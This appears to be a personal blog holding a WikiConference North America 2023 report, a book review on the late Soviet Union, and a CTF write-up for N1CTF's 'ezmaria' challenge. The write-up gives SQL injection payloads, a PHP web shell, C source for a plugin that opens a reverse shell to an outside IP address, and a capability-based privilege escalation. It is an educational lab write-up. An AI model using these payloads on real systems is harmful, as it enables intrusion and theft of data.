Tuesday, November 14, 2023

WikiConference North America 2023 (part 1)

 


 This weekend I attended WikiConference North America. I decided to go somewhat at the last moment, but am really glad I did. This is the first non-technical Wikimedia community conference I have attended since COVID and it was great to hear what the Wikipedia community has been up to.

I was on a bit of a budget, so I decided to get a cheaper hotel that was about an hour away by public transit from the venue. I don't think I'll do that again. Getting back and forth was really smooth - Toronto has great transit. However, it meant an extra hour at the end of the day to get back, and waking up an hour earlier to get there on time, which really added up. By the end I was pretty tired and would much rather have had an extra 2 hours of sleep (or an extra 2 hours chatting with people).

Compared to previous iterations of this conference, there was a much heavier focus on on-wiki governance, power users and "lower-case s" Wikipedia (not Wikimedia) strategy. I found this quite refreshing and interesting since I mostly do MediaWiki dev stuff and do not hear about the internal workings of Wikipedia as much. Previous versions of this conference focused too much (imho) on talks about outreach which while important were often a bit repetitive. The different focus was much more interesting to me.

Key Take-aways

My key take away from this conference was that there is a lot of nervousness about the future. Especially:

  • Wikipedia's power-user demographics curve is shifting in a concerning way. Particularly around admin promotion.
  • AI is changing the way we consume knowledge, potentially cutting Wikipedia out, and this is scary
  • A fear that the world is not as it once was and the conditions that created Wikipedia are no longer present. As the keynote speaker Selena Deckelmann phrased it, "Is Wikipedia a one-generation marvel?"

However I don't want to overstate this. It's unclear to me how pervasive this view is. Lots of presenters expressed views along those lines, but does the average Wikipedian agree? If so, is it more an intellectual agreement, or are people actually nervous? I am unsure. My read is that people were vaguely nervous about these things, but by no means was anyone panicking about them. Honestly though, I don't really know. I also think some of these concerns are undercut by the long history of people worrying about similar things while Wikipedia has endured. Before admin demographics, people were panicking about new user retention. Before AI changing the way we consume content, it was mobile (a threat which I think is actually a much bigger deal).

Admin demographics

That said, I never quite realized the scale of the admin demographic crisis. People always talk about there being fewer admin promotions now than in the past, but I did not realize until it was pointed out that it is not just a little bit fewer but allegedly 50 times fewer. There is no doubt that a good portion of the admin base is people who started a decade (or two) ago, and new admins are fewer and further between.

A related thing that struck me at the conference is how the definition of a "young" Wikipedian seems to be getting older. Occasionally I would hear people talk about someone who is in high school as being a young Wikipedian, with the implication that this is somewhat unusual. However, when you talk to people who have been Wikipedians for a long time, they often say they were teenagers when they started. It seems like being a teenage Wikipedian was really common early in the project, but is now becoming more rare.

Ultimately though, I suspect the problem will solve itself with time. As more and more admins retire, the workload on those remaining will increase until the mop is handed out more readily out of necessity. I can't help but be reminded of all the panic over new user retention, until eventually people basically decided that it didn't really matter.

AI

As far as AI goes, hating AI seems to be a little bit of a fad right now. I generally think it is overblown. In the Wikipedia context, this seems to come down to three things:

  • Deepfakes and other media manipulation making it harder to have reliable sources (mis/disinformation)
  • Using AI to generate articles that get posted but are not properly fact-checked, or are otherwise poor quality in ways that aren't immediately obvious or that existing community practice is not yet well prepared to handle
  • Voice assistants (Alexa), LLMs (ChatGPT) and other knowledge distribution methods that use Wikipedia data but cut Wikipedia out of the loop (a continuation of the concern that started with the Google Knowledge Graph)

I think by and large it is the third point that was the most concerning to people at the conference although all 3 were discussed at various points. The third point is also unique to Wikipedia.

There seemed to be two causes of concern for the third point. First, there was worry over lack of attribution and a feeling that large Silicon Valley companies are exploitatively profiting off the labor of Wikipedians. Second, there is concern that with Wikipedia cut out of the loop we lose the ability to recruit people when there is no edit button, and maybe even lose brand awareness. While totally unstated, I imagine the inability to show fundraising banners to users consuming via such systems is probably on the mind of the WMF fundraising department.

My initial reaction to this is probably one of disagreement with the underlying moral basis. The goal was always to collect the world's knowledge for others to freely use. The free knowledge movement literally has free in the name. The knowledge has been collected and now other people are using it in interesting, useful and unexpected ways. Who are we to tell people what they can and cannot do with it?

This is the sort of statement that is very ideologically based. People come to Wikimedia for a variety of reasons; we are not a monolith. I imagine that people probably either agree with this view or disagree with it, and no amount of argument is going to change anyone's mind. Of course, a major sticking point here is that arguably ChatGPT is not complying with our license, and lack of attribution is a reasonable concern.

The more pragmatic concerns are interesting though. The project needs new blood to continue over the long term, and if we are cut out of the distribution loop, how do we recruit? I honestly don't know, but I'd like to see actual data confirming the threat before I get too worried.

The reason I say that is that I don't think voice assistants and LLMs are going to replace Wikipedia. They may replace Wikipedia for certain use cases, but not all of them, and especially not the use cases our recruitment base comes from.

Voice assistants generally are good for quick fact questions. "Who is the prime minister of Canada?" type questions. The type of stuff that has a one-sentence answer and is probably stored on Wikidata. LLMs are somewhat longer form, but still best for information that can be summarized in a few paragraphs, maybe a page at most, and has a relatively objective "right" answer (from what I hear; I haven't actually used ChatGPT). Complex, nuanced topics are not well served by these systems. Want to know the historical context that led to the current flare-up in the Middle East? I don't think LLMs will give you what you want.

Now think about the average Wikipedia editor. Are they interested in one-paragraph answers? I don't know for sure, but I would posit that they tend to be more interested in the larger nuanced story. Yes, other distribution models may threaten our ability to recruit from their users, but I don't think that is the target audience we would want to focus recruitment on anyway. I suppose time will tell. AI might just be a fad in the end.

Conclusion

I had a great time. It was awesome to see old friends but also to meet plenty of new people. I learned quite a bit, especially about Wikipedia governance. In many ways, it is one of the more surprising wiki conferences I've been to, as it contained quite a bit of content that was new to me. I plan to write a second blog post about my more raw, unfiltered thoughts on specific presentations. (Edit: I never did make a second post, and I guess it's late enough at this point that I probably won't, so never mind about that.)

Monday, October 23, 2023

CTF Writeup N1CTF 2023: ezmaria

This weekend I participated in N1CTF. The challenges were quite hard, and other than give-away questions, I only managed to get one: ezmaria. Despite that, I still ended up in 35th place, which I think is a testament to how challenging some of these problems were. Certainly an improvement from 2021, when I came 98th. Maybe next year I'll be able to solve a problem that doesn't have "ez" in the name.



The problem

We are given a website with a clear SQL injection. It takes an id parameter, does a query, and outputs the result.

First things first, let's see what we are dealing with: 0 UNION ALL select 1, version(); reveals that this is 10.5.19-MariaDB+deb11u2. A bit of an old version, but I didn't see any immediately useful CVEs. (MariaDB is a fork of MySQL, so the name "mysql" still appears all over the place even though this is MariaDB and not MySQL.)

The contest organizers provided a hint: "get shell and run getcap", so presumably the flag is not in the database. Nonetheless, I did poke around information_schema to check what was in the database. There was a fake flag but no real one.

The text of the website strongly implied that it was written in PHP, so continuing on the trend of ruling out the easy things, I tried the traditional 0 UNION ALL select 1, "<?php passthru( $_REQUEST['c'] ); ?>" INTO OUTFILE "/var/www/html/foo.php";

This gave an error message. It appears that OUTFILE triggered some sort of filter. Trying again with DUMPFILE instead bypasses the filter; however, MariaDB then gives us an error message about file system permissions. No dice. It is interesting, though, that I got far enough for it to be a filesystem permission error. This implies that our MariaDB user has FILE or SUPER permissions and that secure_file_priv is disabled.

The next obvious step is to try and learn a little bit more about the environment. MariaDB provides a LOAD_FILE() function to read files. First I tried to read environment variables out of /proc, but that didn't work. The next obvious thing was to fetch the source code of the script generating this page. Since it is implied to be PHP, /var/www/html/index.php is a good guess for the path: 0 UNION ALL SELECT load_file( "/var/www/html/index.php" ),1
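
As with the earlier injections, these queries can be fired off with curl; the /proc attempt, for instance, would look something like this (a sketch; the exact path is an assumption, and it returned nothing here):

# reading files through the injection; this particular path came back empty
curl 'http://urlOfChallenge' --data-urlencode 'id=0 UNION ALL SELECT load_file("/proc/self/environ"), 1'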

Index.php


Finally a step forward. This returned the php script in question, which had several interesting things in it.
 
First off 
$servername = "127.0.0.1";
$username = "root";
$password = "123456";
$conn = new mysqli($servername, $username, $password, $dbn);

Always good to know the DB credentials. While not critical, they do become somewhat useful later. Additionally, the fact we are running as the root database user opens up several avenues of attack I wouldn't otherwise have.

// avoid attack
if (preg_match("/(master|change|outfile|slave|start|status|insert|delete|drop|execute|function|return|alter|global|immediate)/is", $_REQUEST["id"])){
    die("你就不能绕一下喵");
}

Good to know what is and isn't being filtered if I need to evade the filter later, although to be honest this didn't really come up when solving the problem.

$result = $conn->multi_query($cmd);

This is really interesting. Normally in PHP when using mysqli, you would use $conn->query(), not ->multi_query(). Multi_query supports stacked queries, which means I am not just limited to UNION ALL-ing things, but can use a semi-colon to add additional full queries including verbs other than SELECT.

The script unfortunately will not output the results or errors of these other stacked queries, only those of the first query, which significantly slowed down solving this problem, but more on that later.
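
To illustrate, a stacked query through the id parameter would look something like this (a hypothetical example; the second statement is arbitrary):

# the page renders only the first SELECT's rows; the statement after the
# semicolon still executes, but its output and any errors are discarded
curl 'http://urlOfChallenge' --data-urlencode 'id=0 UNION ALL SELECT 1, 2; CREATE DATABASE IF NOT EXISTS test;'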

Last of all, is the secret command:
//for n1ctf ezmariadb secret cmd

if ($_REQUEST["secret"] === "lolita_love_you_forever"){
    header("Content-Type: text/plain");
    echo "\\n\\n`ps -ef` result\\n\\n";
    system("ps -ef");
    echo "\\n\\n`ls -l /` result\\n\\n";
    system("ls -l /");
    echo "\\n\\n`ls -l /var/www/html/` result\\n\\n";
    system("ls -l /var/www/html/");
    echo "\\n\\n`find /mysql` result\\n\\n";
    system("find /mysql");
    die("can you get shell?");
}


Well, that looks promising. Let's do it!

The secret command

For space, I am going to omit some of the less important parts:

`ps -ef` result

UID          PID    PPID  C STIME TTY          TIME CMD
[..]
root          15      13  0 14:06 ?        00:00:00 su mysql -c mariadbd --skip-grant-tables --secure-file-priv='' --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
mysql         20      15  0 14:06 ?        00:00:00 mariadbd --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
[..]


`ls -l /` result

total 96
[..]
-rw-------   1 root  root    32 Oct 22 14:06 flag
-rwxr-xr-x   1 root  root    84 Sep 18 06:10 flag.sh
drwxr-xr-x   1 mysql mysql 4096 Oct 17 22:35 mysql
-rwx------   1 root  root   160 Oct 17 22:35 mysql.sh
[..]


`find /mysql` result

/mysql
/mysql/plugin
/mysql/data
/mysql/data/ibtmp1
[..]
can you get shell?


So some interesting things here.
 
Presumably the only-root-readable flag file is our target. MariaDB is running as "mysql", and thus would not be able to read it. However, a hint was given out to run getcap, so presumably capabilities are in play somehow. This output does not give us any indication as to how, though, so I guess we'll have to figure that out later.

I was immediately curious about the flag.sh file, but it turns out to be just a script that creates the flag file and removes the flag from the environment variables.
 
An interesting thing to note here is that mariadbd is run with some non-standard options: --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin. We already discovered that secure-file-priv had been disabled, but it seems especially interesting combined with setting plugin_dir to a non-standard location that appears to be writable by MariaDB. --skip-grant-tables means that MariaDB does not get user information from the internal "mysql" database. Normally in MariaDB there is a special database named mysql that stores internal information, including what rights various users have; this option says not to use that database for user rights. The impact of this will become clearer later.
 
We are asked "can you get shell?", and it seems like that is a natural place to focus next.

MariaDB plugins

Setting the plugin directory to a non-standard writable directory is a pretty big hint that plugins are in play, so how do plugins work in MariaDB?

There's a variety of plugin types in MariaDB that do different things. They can add new authentication methods, new SQL functions, change the way the server operates, etc. There's also a concept of server-side vs client-side plugins. A client-side plugin is used with custom authentication schemes from programs like the mariadb command line client. Generally, plugins are dynamically loaded compiled shared object (.so or .dll) files.

For server side plugins, they can be enabled in config files, or dynamically via the INSTALL PLUGIN plugin_name SONAME "libwhatever.so"; SQL command. MariaDB then uses dlopen() to load the specified so file.

With all that in mind, a plan forms for how to get a shell. It is still unclear where to go from there, since our shell will be running as the mysql user, which won't be able to read the flag. The hope is that once we have a shell, we can investigate the server more thoroughly and find some way to escalate privileges. In any case, the plan is: write a plugin that spawns a reverse shell, upload the plugin via the SQL injection using INTO DUMPFILE, enable the plugin, and catch the shell with netcat.

Writing a plugin

MariaDB already comes with a lot of plugins, so instead of writing one from scratch I decided to just modify an existing one.

We can download the sources for the debian version of mariadb at https://salsa.debian.org/mariadb-team/mariadb-10.5.git.

I could implement the needed commands in the plugin initialization function, the way a proper plugin would, but it seemed easier to just add a constructor function. This will get executed as soon as MariaDB calls dlopen(), so even if something is wrong with the plugin and MariaDB refuses to load it - as long as it can be linked in, my code will still run.

With that in mind, I added the following to the middle of plugin/daemon_example/daemon_example.cc:
 
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
 
__attribute__((constructor))
void shell(void){
  if (!fork() ) {
    int port = 8080;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("167.172.208.75");

    connect(sockt, (struct sockaddr *) &revsockaddr,
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL); /* NULL envp is fine on Linux */
  }     
}


The __attribute__((constructor)) tells gcc that this function should run immediately upon dlopen(). It then opens a connection to 167.172.208.75 (my IP address) on port 8080, connects stdin, stdout, and stderr to the opened socket, and executes /bin/sh, thus making a remotely accessible shell. On my own computer I will be running nc -v -l -p 8080 waiting for the connection. Once it connects, I will have a shell on the remote server.

I run cmake and make and wait for things to compile. Eventually they do, and we have a nice shiny libdaemon_example.so.
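
Roughly, the build looks something like this (a sketch; the exact cmake invocation and output location may differ):

# grab the Debian MariaDB sources and build everything (this takes a while)
git clone https://salsa.debian.org/mariadb-team/mariadb-10.5.git
cd mariadb-10.5
cmake . && make
# the plugin ends up somewhere like plugin/daemon_example/libdaemon_example.so
find . -name 'libdaemon_example.so'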
 

Installing the plugin

I convert this to base64 and prepare a file named data containing: 0 UNION ALL SELECT from_base64( "...libdaemon_example.so as base64" ) INTO DUMPFILE "/mysql/plugin/libdaemon_example.so"; and upload it via curl 'http://urlOfChallenge' --data-urlencode id@data.
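
Concretely, assembling that data file might look something like this sketch (file names here are arbitrary):

# embed the base64-encoded plugin into the injection payload, then POST it
printf '0 UNION ALL SELECT from_base64("%s") INTO DUMPFILE "/mysql/plugin/libdaemon_example.so";' \
    "$(base64 -w0 libdaemon_example.so)" > data
curl 'http://urlOfChallenge' --data-urlencode id@data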
 
We can confirm it got there safely by doing a query: 0 UNION ALL SELECT md5(load_file( "/mysql/plugin/libdaemon_example.so" )), 1 and verifying the hash matches.

The hashes match, so it's time to put this into action. I give the SQL: 0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";

And wait in eager anticipation for netcat to report a connection, but the connection never comes.

----

This is where things would be much simpler if our SQL injection actually reported errors from stacked queries. Without that, we just have to guess what went wrong, and guess I did. Figuring out why it didn't work took hours.

Initially when testing locally it worked totally fine, using the same version of MariaDB with the same options. I even tried on a different version of MariaDB I had installed, where MariaDB refused to load the plugin due to an API mismatch, but nonetheless my code still ran because it was in a constructor function.
 
After bashing my head against it for several hours, I eventually noticed that my file structure looked different from what was on the server. On my local computer there was a "mysql" database (in the sense of a collection of tables, not in the sense of the program), whereas the server only had the ctf and information_schema databases. When compiling MariaDB locally, I had run an install script that created the mysql database automatically.

Getting rid of the mysql database, I was able to reproduce the problem locally and got a helpful error message. It turns out INSTALL PLUGIN uses the mysql.plugin table internally and refuses to run if it isn't present. I dug around the MariaDB sources and found scripts/mysql_system_tables.sql, which had a definition for this table.

This also explains why the --skip-grant-tables option was set. Without it, MariaDB will abort if the mysql.global_priv table is not present. Hence the option is needed for MariaDB to even run in this setup.

With that in mind, I gave the following commands to the server to create the missing plugin table:

 0;
 CREATE database mysql;
 USE mysql;
 CREATE TABLE IF NOT EXISTS plugin ( name varchar(64) DEFAULT '' NOT NULL, dl varchar(128) DEFAULT '' NOT NULL, PRIMARY KEY (name) ) engine=Aria transactional=1 CHARACTER SET utf8 COLLATE utf8_general_ci comment='MySQL plugins';

Now, with mysql.plugin existing, let's try this again:

0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";
 
I then look over to my netcat listener:
 
Listening on 0.0.0.0 8080
Connection received on 116.62.19.175 26740
pwd
/mysql/data
 
We have shell!

Exploring the system

Alright, we're in. Now what?

The contest organizers gave a hint saying to run getcap, so that seems like a good place to start:

getcap -r / 2> /dev/null
/usr/bin/mariadb cap_setfcap+ep

Well that is something. Apparently the MariaDB command line client (not the server) has the setfcap capability set.

What are capabilities anyhow?

While I have certainly heard of linux capabilities before, I must admit I wasn't very familiar with them. So what are they?

Capabilities are basically a fine-grained version of "root". Each process (thread technically) has a certain set of capabilities, which grant it rights it wouldn't normally otherwise have.

For example, if you are running a web server that needs to listen on port 80, instead of giving it full root rights, you could give the process CAP_NET_BIND_SERVICE capabilities, which allows it to bind to port 80 even if it is not root. Traditionally you need root to bind to any port below 1024.
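
For example, granting just that one capability could look like this (the binary path is hypothetical):

# allow a non-root web server binary to bind to ports below 1024
sudo setcap cap_net_bind_service+ep /usr/local/bin/mywebserver
# confirm what was set
getcap /usr/local/bin/mywebserver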

There are a variety of capabilities that divide up the traditional things that root gives you, e.g. CAP_CHOWN to change file owners or CAP_KILL to send signals, and so on.

Sounds simple enough, but the rules on how capabilities are transferred between processes are actually quite complex. Personally I found most of the docs online a bit confusing, so here is my attempt at explaining:
 
Essentially, each running thread has 5 sets of capabilities, and each executable program has 2 sets + 1 special bit in the filesystem. What capabilities a new process will actually have and which ones are turned on is the result of the interplay between all these different sets.

The different capabilities associated with a thread are as follows (You can view the values for a specific running process in /proc/XXX/status):
  • Effective: These are the capabilities that are actually currently used for the thread when doing permission checks. You can think of these as the capabilities that are currently "on".
  • Permitted: These are the capabilities that the thread can give itself. In essence, these are the capabilities that the thread can turn on, but may or may not currently be "on" (effective). If a capability is in this set but not the effective set, it won't be used for permission checks at present but a thread is capable of enabling it for permission checks later on with cap_set_proc().
  • Inheritable: These are the capabilities that can potentially be inherited by new processes after doing execve. However the new process will only get these capabilities if the file being executed has also been marked as inheriting the same capability.
  • Ambient: This is like a super-version of inheritable. These capabilities will always be given to child processes after execve even if the program is not explicitly marked as being able to inherit them. It will inherit them into both its effective set and its permitted set, so they become "on" by default.
  • Bounding: This is more like a maximum limit. Anything not in this set can never be given out or gained. On a normal system you probably have all capabilities in this set, but if you wanted to set up a restricted system, some capabilities might be removed from here to ensure it is impossible to ever gain them back.
In addition to threads having capabilities, executable files on the file system also can have capabilities. This is somewhat akin to how SUID works (although unlike SUID this is not marked in the output of ls in any way). Files have 2 sets of capabilities and 1 special flag. These can be viewed using getcap:
  • Permitted: These are the capabilities that the executable will get when being executed. The process will get all of these capabilities (except those missing from the bounding set) even if the parent process does not have these capabilities. It's important to remember that the file permitted set is a different concept from the permitted set of a running process.
  • Inheritable: These are the capabilities the executable will get if the running parent process also has them in its inheritable set.
  • Effective flag: This is just a flag not a set of capabilities. This controls how the new process will gain capabilities. If it is off, then the new capabilities will go in the thread's permitted set and won't automatically be enabled until the thread itself enables them by adding to its own effective set. If this flag is on, then the new capabilities for the thread go in the thread's effective set automatically (i.e. they start in an "on" state).
Generally, capabilities for files are displayed as capability_name=eip, where e, i and p denote which file set the capability is in (e is a flag, so it has to be on for all of the capabilities or none of them).
 
To summarize file system capabilities: "permitted" are the capabilities the process automatically gets when started regardless of the parent process, "inheritable" are the ones it can potentially gain from the parent process but generally won't get if the parent does not have them in its inheritable set, and the effective flag controls whether the capabilities are on by default or whether the process has to make a syscall before they become turned on.
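
You can poke at these sets on any Linux box. A quick illustration (the masks shown are typical for an unprivileged shell and vary by kernel):

# the five capability sets of the current shell, as hex bitmasks
grep Cap /proc/$$/status
#   CapInh: 0000000000000000
#   CapPrm: 0000000000000000
#   CapEff: 0000000000000000
#   CapBnd: 000001ffffffffff
#   CapAmb: 0000000000000000

# translate a bitmask back into capability names
capsh --decode=000001ffffffffff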

This is a bit complex, so let's consider an example:

Consider an executable file named foo that has cap_chown in its (filesystem) inheritable set and cap_kill in its (filesystem) permitted set.
 
 sudo setcap cap_chown=+i\ cap_kill=+p ./foo
 
This means that when we execute it, the foo process will definitely have cap_kill in its permitted set (as long as it is in the bounding set of the parent process). It might also have cap_chown in its permitted set, but only if the parent process had cap_chown in its inheritable set. However, its effective set will be empty (assuming no ambient capabilities are in play) until foo calls cap_set_proc(). If instead the e flag was set, these capabilities would immediately be in the effective set without having to call cap_set_proc(). Regardless, if the foo process execve's some other child process whose executable is not marked as having any capabilities, the child will not inherit any of the capabilities foo has.


I've simplified this somewhat; see the capabilities(7) man page for the full details.

MariaDB's capabilities

With that in mind, let's get back to the problem at hand.

/usr/bin/mariadb cap_setfcap+ep

So the MariaDB client has the setfcap capability. It is marked effective and permitted, which means the process will always get it and have it turned on by default when executed.

What is cap_setfcap? According to the manual, it allows the process to "Set arbitrary capabilities on a file."

Alright, that sounds useful. We want to read /flag despite not having permission to, so we can get mariadb with its CAP_SETFCAP capability to give another executable CAP_DAC_OVERRIDE capability. CAP_DAC_OVERRIDE means ignore file permissions, which would allow us to read any file.

My initial thought was to use the \! operator in the mariadb client, which lets you run shell commands, to run setcap(8). However, it quickly became obvious that this wouldn't work. Since these capabilities are only in the permitted & effective sets, they are not going to be inherited by the shell. Even if they were in the inheritable set, the shell's executable would also have to be marked as inheriting them for that to happen. Thus any subshell we make is unprivileged.

We need mariadb to execute our commands inside its process without running execve. The moment we execve we lose these capabilities.

Luckily, we can basically use the same trick as last time. In addition to mariadbd server supporting plugins, mariadb client also supports plugins. These are used for supporting custom authentication methods.
 
In MariaDB, users can be authenticated via plugins. These server-side authentication plugins can also have a client-side component. If you try to log in as a user marked as using one of these plugins, the MariaDB client will automatically try to load (dlopen()) the relevant client-side plugin.

I again modified an existing one instead of trying to make my own. I decided to go with the dialog_example plugin from the MariaDB source code.

The server-side part of this is from plugin/auth_examples/dialog_examples.c. The only change I made was to switch mysql_declare_plugin(dialog) to maria_declare_plugin(dialog) and set the stability to MariaDB_PLUGIN_MATURITY_STABLE (previously 0). This was needed for MariaDB to load the plugin in the default configuration. For clarity's sake: although the name of the file is dialog_examples, the plugin's actual name is "two_questions".
 
After compiling, this generated a dialog_examples.so file which I uploaded to the server in the same fashion as before.

The client side part of the plugin is from libmariadb/plugins/auth/dialog.c. I added the following code:

#include <sys/capability.h>

#define handle_error(msg) \
   do { perror(msg); } while (0)

__attribute__((constructor))
void foo(void) {
        cap_t cap = cap_from_text( "cap_dac_override=epi" );
        if (cap == NULL) handle_error( "cap_from_text" );
        int res = cap_set_file( "/mysql/priv", cap );
        if (res != 0 ) handle_error( "cap_set_file" );
}


I also modified libmariadb/plugins/auth/CMakeLists.txt to add LIBRARIES cap to the REGISTER_PLUGIN directive to ensure it is linked with libcap.

This code essentially says: when the plugin is loaded, change the file capabilities of /mysql/priv to cap_dac_override=epi (the i is probably unnecessary), thus allowing that program to read all files.

Compiling this made libmariadb/dialog.so which I uploaded to the server in the usual fashion. I also ran cp /bin/cat /mysql/priv to create the target for our plugin's capability modifications.

Setting things up to run the plugin

Now that these pieces are in place, we still have to convince the mariadb client to run our plugin. This comes down to trying to log in to a mariadb server as a user that needs the dialog/two_questions authentication method.
 
Normally this would be pretty easy, just run CREATE USER. However, that uses the grant table which is explicitly disabled.
 
At first I thought I was going to need to somehow get rid of this option on the server (or, I suppose, just use a server on a different host; I didn't think of that at the time, but it probably would have been simpler). However, it turns out that even if the server starts without the grant tables enabled, you can enable them after the fact by running FLUSH PRIVILEGES.

Of course, these tables don't even exist, and the normal methods of adding entries (CREATE USER command) won't work until they do. Thus we have to manually create the table ourselves and make appropriate entries.
 
I log in using the mariadb command line client from the shell, as this is a lot easier than the SQL injection, and run the following commands to set this all up:
 
$ mariadb -u root -h 127.0.0.1 -p123456 -n

use mysql;
source /usr/share/mysql/mysql_system_tables.sql; -- install defaults for mysql db

INSTALL PLUGIN two_questions SONAME "dialog_examples.so";

INSERT INTO `global_priv` VALUES ('%','foo','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"two_questions\",\"authentication_string\":\"*00A51F3F48415C7D4E8908980D443C29C69B60C9\",\"password_last_changed\":1698000149}' );

INSERT INTO `global_priv` VALUES ('%','root','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"mysql_native_password\",\"authentication_string\":\"*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9\",\"password_last_changed\":1698000149}' );

FLUSH PRIVILEGES;

 
In summary: I use the -n option to ensure mariadb flushes output; since we don't have a pseudo-terminal, output will show up way too late if we don't do this.

I switch to the special mysql database which we created earlier. I already created the plugin table, but now I use SOURCE to create the other defaults for the mysql database. The mysql_system_tables.sql file was already present on the server. Then we insert a root user so we don't lose access, along with a foo user that uses our plugin.

Once we run FLUSH PRIVILEGES, the new permissions take effect.

We now exit this and try logging in as foo, being sure to specify the appropriate plugin directory:
 
mysql -u foo -h 127.0.0.1 -n --plugin-dir=./plugin

The login doesn't work, but the plugin seems to have been executed. We had previously copied cat to /mysql/priv. If everything worked right, it should now be able to read any file on the system regardless of permissions:

/mysql/priv /flag
n1ctf{9a81f84cc7a3064e34800c35}


Success!

Conclusion

This was a fun problem. It taught me some of the internals of MariaDB and was a good excuse to finally commit the time to understanding how Linux capabilities actually work.

The biggest challenge was figuring out that the mysql.plugin table was needed to load a plugin. It probably would have been a lot less frustrating a problem if error messages from stacked queries were actually output.

Nobody solved this problem until fairly late in the competition, but then about 8 teams did. The CTF organizers did release a hint that capabilities were involved. I wonder if many teams just didn't think to check for that, as giving mariadb random capabilities it can't even use is not something that is likely to happen in real life, and capabilities are much less famous than SUID binaries.

Perhaps teams didn't get that far and simply saw from the output of the "secret" website command that some sort of unknown privilege escalation was necessary, figured it might be some really involved thing, and decided to work on other problems instead. In a way I'm kind of surprised that getcap output wasn't included in the secret command to give people more of a direct hint; other more obvious things were, after all. For that matter, it is kind of weird how ls doesn't mark files with capabilities in any special way, like it would a SUID binary. I know it's not stored in the traditional file mode, but nonetheless I found it a little surprising how hidden it is from traditional cli tools that capabilities are in play.


Thursday, October 12, 2023

Books: Everything Was Forever, Until It Was No More


Everything Was Forever, Until it Was No More by Alexei Yurchak.

This isn't the sort of book I would normally read. However, with Ukraine and Russia in the news, I found myself wanting to know more about the context of the conflict. So I went to the library and found this on the shelf. I picked it pretty much at random from my library's collection of books on the USSR. It seemed to focus on how the collapse of the Soviet Union happened, which interested me: how does Russia go from being a superpower to what it is now?

I don't know much about the Soviet Union beyond the high-level summary of the Cold War you get in high school history class. This book does not seem to be a textbook summarizing various views so much as an academic book putting forth a specific view. Without knowing much about the subject, it's difficult to judge how critically I should read it, but taking it at face value, this book nonetheless presents a fascinating point of view on what happened.

This was a challenging book to read. I'll do my best to summarize, although I'll probably do a bad job, as I would need to do a second read-through (at least) to really understand what this book presents.

The general premise seems to be that after the death of Stalin, the words and symbols of the regime became hyper-formulaic and purely ritualistic, almost like a religion where everyone prays but nobody actually pays attention to what they are saying. This led to the system feeling eternal, because it was always the same rituals referencing the same historic speeches and ideas. However, during perestroika, when people were suddenly encouraged to improve the status quo in a more bottom-up fashion and question old truisms, the system quickly collapsed as it became obvious the old symbols were just empty.


One of the main points of this book is that it is wrong to view the people of the soviet union as either against the soviet system or for the system. The situation is much more complex than such a black and white binary.

For example, the author talks a lot about the local leaders of the Komsomol youth group. According to the author, they would often be quite ideologically motivated, believing in communism, but at the same time not afraid to fake the more ideologically motivated busy work in order to do things that actually mattered. They didn't see this as contradictory but as a way to further socialism. Similarly, western cultural imports were often seen not as opposing socialism but as furthering it (though not always). Everything depended on context, and actions that might seem from the outside to be against soviet communism might seem to people in the system to be perfectly reasonable things to do, in accordance with the precepts of communism.

I found the discussions of how social relations manifested in these groups to be particularly interesting. According to the author, while being a dissident or overly negative towards the soviet system was certainly frowned upon, so was being obnoxiously pro-soviet. What was more important was to be one of the group, a "normal" person, and not someone who caused problems for other people. An antagonistic person causes problems for the group, regardless of which direction they are antagonistic in. People insisting the group follow every precept to the letter are just as annoying and disruptive as people trying to tear down the system. The people who thrive are the ones who help each other out; who attend silly meetings, even if they think they are stupid, because they know their friend will be judged by how many people show up; and who keep things running smoothly.

I can't help but feel that the author's description of this mirrors how office politics and cliques work in the workplaces of the capitalist world. Most places I've worked, and especially my experience with the MediaWiki open source project, mirror this. There are usually two power structures: the official one and the unofficial one. The official hierarchy might give orders, but if you actually want to accomplish anything it pays to know who the right people are, and to be on good terms with them so they identify you as one of "them". Being successful means enmeshing yourself in the local social fabric, helping out other people where you can so that they will help you in turn. At MediaWiki this is turned up to 11, where some people are volunteer devs and some people are paid, with all sorts of different interest groups with varying, sometimes even contradictory, goals. The coming together of different conflicting groups can really exacerbate us-vs-them dynamics and unofficial power structures. People might wax poetic about us-vs-them narratives being dangerous. They certainly aren't wrong, but at the same time it is always there to one extent or another. For better or worse, if you want to accomplish something, in any field, you need to get yourself to be an "us" and not a "them".

The author then goes into a discussion of more counter-cultural types (for lack of a better word). According to the author, these people were less opposed to the system than opting out of it. Their opposite wasn't to oppose the system but to just not care about it: to live their lives without worrying, talking, or thinking about the system. I suppose it's a little like the old saying: the opposite of love is not hate but indifference.

All this really turned on its head my preconceived notion of an authoritarian government that individual citizens were plotting to overthrow. Of course, I'm not sure how critically to read this book; no doubt there were many soviet dissidents in the traditional sense too. However, I suppose this makes sense to me: for any given thing, some people will love it, some will hate it, and most will just get on with their lives and do the best that they can, while still inevitably affecting the system.


All in all, this was a fascinating book that gave me a lot to think about. My summary was probably a poor attempt; there is much I don't quite understand. Regardless, this book was like a look into an alien world, where things are both really different but at the same time similarities shine through. In fact, I wish SF authors would make their aliens a little less like carbon copies of western societies. Obviously aliens would not be human at all, but at the very least we can make them not be culturally American.

In conclusion though, the central question this book is supposed to answer is: how did the soviet culture go from feeling eternal to collapsing almost overnight? I wish the book spelled the answer out a little more for me. I can see how everything in this book builds towards and has bearing on that question, but I feel like I am missing a piece of the puzzle to make it all fit. I see how unique cultural practices, rituals, symbols and forms of messaging were very suddenly upended by perestroika, but I still feel I am in the dark on why the soviet system could not survive that or shift to something new. In fairness, perhaps I just need to read it a bit more closely, or be better versed in the context of the soviet system, which I know very little about.

Regardless, a fascinating read and window into another culture.

